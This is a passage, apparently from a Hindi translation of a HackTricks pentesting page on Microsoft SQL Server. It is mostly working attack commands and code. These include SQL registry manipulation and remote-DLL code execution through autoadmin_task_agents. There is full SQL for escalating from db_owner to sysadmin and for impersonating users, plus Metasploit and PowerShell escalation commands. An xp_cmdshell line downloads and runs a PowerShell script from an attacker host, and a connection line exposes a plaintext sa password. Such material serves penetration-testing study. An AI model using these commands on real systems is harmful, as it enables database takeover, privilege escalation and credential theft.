sys.xp_regdeletevaluesys.xp_instance_regdeletevalue
sys.xp_regdeletekeysys.xp_instance_regdeletekey
sys.xp_regaddmultistringsys.xp_instance_regaddmultistring
sys.xp_regremovemultistringsys.xp_instance_regremovemultistring
 
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

For more examples check out the original source.

MSSQL User Defined Function - SQLHttp के साथ RCE

MSSQL के भीतर custom functions के साथ एक .NET dll लोड करना संभव है। हालांकि, इसके लिए dbo access चाहिए, इसलिए आपको database के लिए sa या Administrator role के रूप में connection चाहिए।

इस लिंक का पालन करें एक example देखने के लिए।

autoadmin_task_agents के साथ RCE

इस post के अनुसार, remote dll लोड करके MSSQL से इसे इस तरह execute कराना भी संभव है:

update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";

With:

using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{

Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}

public override void DoWork()
{

}

public override void ExternalJob(string command, LogBaseService jobLogger)
{

}

public override void Start(IServicesFactory services)
{

}

public override void Stop()
{

}


public void Test()
{

}
}
}

RCE के लिए अन्य तरीके

कमांड execution पाने के अन्य तरीके भी हैं, जैसे extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, और external scripts.

MSSQL Privilege Escalation

db_owner से sysadmin तक

अगर किसी regular user को admin यूज़र (जैसे sa) के स्वामित्व वाले database पर db_owner role दिया गया है और वह database trustworthy के रूप में configured है, तो वह user इन privileges का abuse करके privesc कर सकता है क्योंकि वहाँ बनाई गई stored procedures owner (admin) के रूप में execute कर सकती हैं।

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

आप एक metasploit module का उपयोग कर सकते हैं:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

या एक PS script:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

अन्य users का Impersonation

SQL Server में एक विशेष permission होती है, जिसका नाम IMPERSONATE है, जो executing user को किसी अन्य user या login के permissions लेने की अनुमति देती है, जब तक कि context reset न हो जाए या session समाप्त न हो जाए।

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

Tip

अगर आप किसी user को impersonate कर सकते हैं, भले ही वह sysadmin न हो, तो आपको check करना चाहिए कि क्या user के पास access है अन्य databases या linked servers तक।

ध्यान दें कि एक बार आप sysadmin हो जाएँ, तो आप किसी भी अन्य को impersonate कर सकते हैं:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

आप इस attack को एक metasploit module के साथ perform कर सकते हैं:

msf> auxiliary/admin/mssql/mssql_escalate_execute_as

या PS script के साथ:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Persistence के लिए MSSQL का उपयोग

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

SQL Server Linked Servers से passwords निकालना

एक attacker SQL Server Linked Servers के passwords को SQL Instances से extract कर सकता है और उन्हें clear text में प्राप्त कर सकता है, जिससे attacker को ऐसे passwords मिलते हैं जिनका उपयोग target पर अधिक foothold हासिल करने के लिए किया जा सकता है। Linked Servers में stored passwords को extract और decrypt करने वाली script यहाँ मिल सकती है

इस exploit के काम करने के लिए कुछ requirements और configurations करनी होंगी। सबसे पहले, आपके पास machine पर Administrator rights होने चाहिए, या SQL Server Configurations को manage करने की क्षमता होनी चाहिए।

अपनी permissions validate करने के बाद, आपको तीन चीजें configure करनी होंगी, जो निम्नलिखित हैं:

  1. SQL Server instances पर TCP/IP enable करें;
  2. एक Start Up parameter जोड़ें, इस case में, एक trace flag जोड़ा जाएगा, जो -T7806 है।
  3. remote admin connection enable करें।

इन configurations को automate करने के लिए, this repository में आवश्यक scripts हैं। हर configuration step के लिए powershell script होने के अलावा, repository में एक full script भी है जो configuration scripts और passwords के extraction और decryption को combine करती है।

अधिक जानकारी के लिए, इस attack से संबंधित निम्न links देखें: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

Local Privilege Escalation

MSSQL server चलाने वाला user privilege token SeImpersonatePrivilege.
enabled रखेगा।
संभवतः आप इन 2 paged में से किसी एक का पालन करके Administrator तक escalate कर पाएँगे:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

JuicyPotato

Shodan

  • port:1433 !HTTP

References

HackTricks Automatic Commands

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें